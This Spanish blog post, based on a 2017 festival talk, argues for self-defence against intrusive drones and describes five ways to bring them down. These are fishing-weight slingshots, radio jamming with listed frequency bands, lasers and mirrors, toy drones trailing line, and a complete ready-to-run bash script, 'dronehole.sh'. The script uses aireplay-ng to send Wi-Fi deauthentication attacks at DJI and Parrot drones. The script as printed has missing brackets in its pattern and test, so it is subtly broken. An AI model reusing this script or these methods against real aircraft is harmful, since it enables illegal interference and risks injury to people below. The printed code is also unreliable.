Nos lanzamos a la tecnología como si no hubiera un mañana, solucionamos problemas existentes, pero creamos nuevos. Los drones son herramientas con gran poder, y sus usos pueden ir desde salvarnos la vida a quitárnosla. En aeracoop nos hemos pasado los últimos cinco años construyendo drones, pero después de la explosión de la burbuja drone, nos planteamos si no sería buena idea derribarlos.

Este post ha sido creado para la charla del mismo título realizada en el Candelaria Drone Festival 2017, de Tenerife.

Drones vs Humans, la nueva moda de youtube

Con la madurez de los drones y la accesibilidad para el gran público, han llegado también sus usos indeseados. Los vídeos con el tag #dronesvshumans, muestran una lista cada vez mayor, de accidentes, abusos de poder, violaciones de la intimidad, y no es lo único, puedes encontrar drones vs animals o drones vs policia.

Cuando ideamos el drone autoconstruido flone, pensábamos en la democratización del espacio aéreo, en que todo el mundo pudiera aprender a construir uno a bajo coste. Pero la democratización -del aparato, no del conocimiento- vino con los drones DJI, el apple del aire. Eramos inocentes pensando sólo en las bondades del espacio aéreo, pero hace varios años descubrí asustado a un youtuber holandés dedicado a perseguir tías buenas con su Phantom. Fue un punto de inflexión, comprendí que debíamos dedicar recursos, no solo a construirlos, sino también a derribarlos.

Tecnología de poder

Guiado por la sensación de impotencia de ser droneado – cuando vuelan sobre ti de manera intimidatoria-, consciente del poder que se tiene sobre los que hay debajo, y la rabia de que un aparato que puede servir para tantas tareas humanitarias, sea utilizado para mirar culos, comencé a desarrollar una linea de trabajo dedicada a derribarlos.

Espacio personal

espacio personal

Si eres piloto de drones, antes de que te lleves las manos a la cabeza leyendo este post, es importante entender el concepto de espacio personal. Todos tenemos un espacio personal, puede ser mayor o menor por cuestiones culturales, si alguien está demasiado cerca de nosotros, nos sentirnos intimidados, y si está lejos no nos molestará. También depende de la persona que se acerque, si representa una amenaza, o si es tu pareja le permitirás intimidad.

¿Cómo funcionan estas reglas cuando no tenemos ni idea de quien está pilotando la aeronave? Tienen la misma apariencia si lo pilota un adolescente o  unos ladrones para vigilar las personas de un inmueble, como ha ocurrido en Brasil y en Honduras. No ocurre como con un animal, o una persona. Podemos sospechar su estado emocional o grado de peligrosidad, el aspecto del drone es el mismo independiente de sus objetivos. Si no podemos ver al piloto, la sensación de indefensión es total, al desconocer quien está al mando.

leopardo agresivo

¿Quien es el bueno y el malo? Solo podemos guiarnos por su aspecto.

No vamos a desatar una paranoia cada vez que veamos un drone, pero saber que hacer te dará seguridad y no estarás indefens@, es como las artes marciales cuando caminas en un lugar peligroso, mejor no utilizarlas, pero si las necesitas sabes que están ahí. ¿Te imaginas que sólo la policía supiese como derribar drones? El mundo será mas seguro (también por el terrorismo) si tenemos acceso a esta información. Los pilotos también se lo pensarán dos veces antes de cometer una ilegalidad ya que no gozarán de esta inmunidad.

Sobre la esfera de seguridad personal, es importante conocer la tecnología para saber modularla adecuadamente. Las cámaras de los drones comerciales no suelen tener gran zoom, para grabarte con detalle deben de acercarse mucho. La mayoría de los casos serán pilotos comerciales que hacen su trabajo y ni se han dado cuenta que estas ahí, o aficionados que les encanta volar.

Si no puedes encontrar al piloto y está volando bajo, y cerca de casas o personas, si podría ser un motivo de preocupación, como máquinas que son, pueden fallar y pueden hacerte daño. En caso de sobrepasar esta barrera personal, puedes plantearte realizar una legítima defensa.

Mecanismos de defensa social contra drones

Hace algunos años asistimos a la creciente utilización y abuso de poder, por parte de propietarios de drones, y fuerzas de seguridad del estado. Desde dronehackademy pensamos que era importante documentar las diferentes herramientas que teníamos a nuestra disposición para deshacernos de drones indeseables. Dimos incluso un taller para adolescentes en una favela de la periferia de Sao Paulo, para protegerse de estas aeronaves.

Si decides tomar cartas en el asunto, ten en cuenta que puede ser ilegal derribar una aeronave privada, pero siempre puedes denunciarlo. Según la ley, el acto de legítima defensa exige que la respuesta sea proporcional al riesgo:

Si para repeler una agresión recurrimos a la violencia, hablaremos de defensa propia o legítima defensa, que implica un previo ataque y supone la ausencia o limitación de responsabilidad por el daño que podamos causar

En caso de que quieras defenderte legalmente, toma fotografías de las zonas donde ha volado el drone, y si puedes también del piloto para identificarlo. Puedes tomar como guía este modelo de denuncia de drones que normalmente usa la policía. Actualmente en España es ilegal sobrevolar casas, personas, ni volar a más de 500 metros de distancia.

Habla con el piloto

Antes de abatir el drone, lo más pacífico es encontrar al piloto.

Generalmente se encuentran cerca, en el rango de visión de la aeronave, aunque también pueden estar a varios kilómetros. Se encontrará en una situación vulnerable, con las manos sobre el mando, y poca capacidad de comunicación por la atención necesaria para pilotar la aeronave.

Si quieres saber los detalles del vuelo, o mostrarle tu malestar por sobrevolar encima de ti o tu casa, primero pídele que aterrice la aeronave.

Después puedes intimidarle con una argumentación legal o moral para que desista de seguir volando, mejor si conoces la legislación vigente en tu país.

Cinco métodos para inutilizar drones

Estos métodos no incluyen armas de fuego y deben usarse con cuidado, nunca cuando haya personas debajo.

ProyectilTirachinas

 

 

 

 

 

 

1. Plomo de pesca + Tirachinas

Los  proyectiles más efectivos son los plomos de pesca lanzados con tirachinas. Deben ser esféricos para mejorar la puntería y no desviarse. Aquí el truco es anidar 6-8 hilos de pesca por el agujero, de esta manera basta con que el plomo pase cerca del drone para que el aire que mueve las hélices, absorba el hilo y se enrede en los motores.

También hay en el mercado munición ferromagnética específica contra drones, se quedaría pegada a las partes metálicas del drone.

Influye mucho la práctica que tengas con el tirachinas y su calidad, es más eficiente estirar la goma y lanzar rápidamente, que produce un tiro más distante.

2. Jamming

jammer de dronesExisten varios tipos de Jammers, o inhibidores de frecuencia, actuan sobre diferentes bandas y tienen diferentes resultados: la banda GPS, la banda de control, o la banda de vídeo FPV. Normalmente las frecuencias utilizadas son:

433 Mhz Telemetria (Europa)
900 Mhz Telemetria (EEUU)
2.4 Ghz Control
1.2 Ghz Video analógico (FPV)
5.8 Ghz Vídeo analógico (FPV)

La intervención del espectro electromagnético o la posesión de estos aparatos está prohibida en muchos países.

Existe un jammer de código abierto llamado Wave Bubble, cabe en una caja de cigarrillos y puede interferir en varias bandas simultáneamente. Su venta está prohibida, el principal método para obtenerlo es fabricarlo tu misma.

Interferir la señal de GPS afecta a la estabilidad del drone y la habilidad del piloto es determinante para que consiga aterrizarlo con seguridad.

Los drones DIY pueden controlarse por First Person View (FPV), transmitiendo la señal de vídeo analógico desde la cámara al piloto, en la banda de 5.8 GHz o 1.2 GHz. Con un receptor de vídeo, puedes buscar el canal de la imagen del drone y chafarla ocupándola con otro emisor. Dejarás al piloto ciego, y a no ser que tenga GPS, no podrá volver a casa.

3. dronehole.sh: Ataque de desautentificación

Puedes atacar a los drones que utilizan las redes wifi convencionales a través de los bugs de esas redes. El ataque se realiza con un computador con Linux y una tarjeta wifi potente. Dronehole.sh es un ataque de desautentificación que escanea el wifi alrededor buscando dispositivos DJI o Parrot. En modelos Phantom antiguos sólo interrumpirá la transmisión del video, en el caso de los drones Mavic y Spark controlados sólo por smartphone y ARDrone y Beboop de Parrot, se perderá el control total del drone y éste aterrizará automáticamente.

#!/bin/bash
# DRONEHOLE.SH
# Find and kick drones from a local wireless network.  Requires
# 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host.  Put on PC, BeagleBone
# black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
# and wear it.
# Save as dronehole.sh, 'chmod +x dronehole.sh' and exec as follows:
#   sudo ./dronehole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
shopt -s nocasematch # Set shell to ignore case
shopt -s extglob # For non-interactive shell.
NIC=$1 # Your wireless NIC
BSSID=$2 # Network BSSID (exhibition, workplace, park)
MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not present.
GGMAC='@(60:60:1F*|00:12:1C*|00:26:7E*|90:03:B7*)' # Match against DJI & Parrot drones
POLL=30 # Check every 30 seconds
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device
while true;
   do  
       for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
       '(xdigit:{1,2}:){5}xdigit:{1,2}')
          do
              if  $TARGET == $GGMAC 
                  then
                      # Audio alert
                      beep -f 1000 -l 500 -n 200 -r 2
                      echo "Dronehole discovered: "$TARGET
                      echo "De-authing..."
                      aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                   else
                       echo $TARGET": is not a drone. Leaving alone.."
              fi
          done
          echo "None found this round."
          sleep $POLL
done
airmon-ng stop mon0
espejo anti drone
laser anti drone

 

 

 

 

 

4. Lásers y espejos

Puedes cegar la cámara de un drone con un espejo si hace sol, apuntando su reflejo directamente a su cámara. Incomodarás mucho al piloto y no podrá grabar. Si le apuntas con un láser, puedes cegar la cámara temporalmente o incluso dañar el sensor CCD.

5. Drone Anti Drone

drone de juguete anti drone

Este es uno de mis métodos favoritos. Un pequeño drone de juguete es suficiente para derribar al multicóptero más avanzado. Basta con atar un hilo de pescar bastante largo al drone de juguete y volarlo junto al drone a derribar. Éste se enredará con el hilo y caerá. Puede ser que tu también pierdas tu juguete.

 

 

Conclusiones

métodos para inhibir drones

El espacio aéreo es aire público, tenemos derecho a volar, pero también derecho a protegernos. Ser sobrevolado por una aeronave puede violar el derecho a la intimidad y se puede percibir como un acto intimidatorio si no conocemos al piloto ni la naturaleza del vuelo.

Los drones están al alcance de casi cualquier individuo, a pesar de su inmenso poder, existen estrategias para neutralizarlos o inhibirlos. Las técnicas deberán minimizar el riesgo en su puesta en práctica, son diversas y dependerán del tipo y altura del drone del cual queramos protegernos. Una sociedad segura es aquella que tiene los medios para defenderse. No existe jurisprudencia sobre este derecho de legítima defensa en el espacio aéreo y las actuaciones deberán ser proporcionales al riesgo.

La violencia nunca resolverá los conflictos de este mundo. Usarla contra un piloto de drones no va a hacer que dejen de fabricarse, ni dejen de volar, ni de violentar a otras personas. Pero no podemos hacer reconocer nuestros derechos más que entrando en lucha con quienes los violan. La función de la lucha debe ser crear condiciones de diálogo, estableciendo una nueva relación de fuerzas que obliguen a reconocernos como interlocutores. Es precisamente porque el diálogo no es posible muchas veces, por lo que es necesaria esta lucha.

 

Lot amoros reparando un droneAcerca del autor de esta entrada, Lot Amorós.

Lot Amorós es el fundador de Aeracoop, donde comparte ideas, estrategias, y herramientas creativas en torno a los vehículos aéreos no tripulados, con el objetivo de hacer un mundo mejor a través del aire. Si estás creando una idea o proyecto aéreo, y quieres emprenderlo por ti mismo, apúntate gratis a la lista de correo, donde comparte recursos para empoderarte en el espacio aéreo.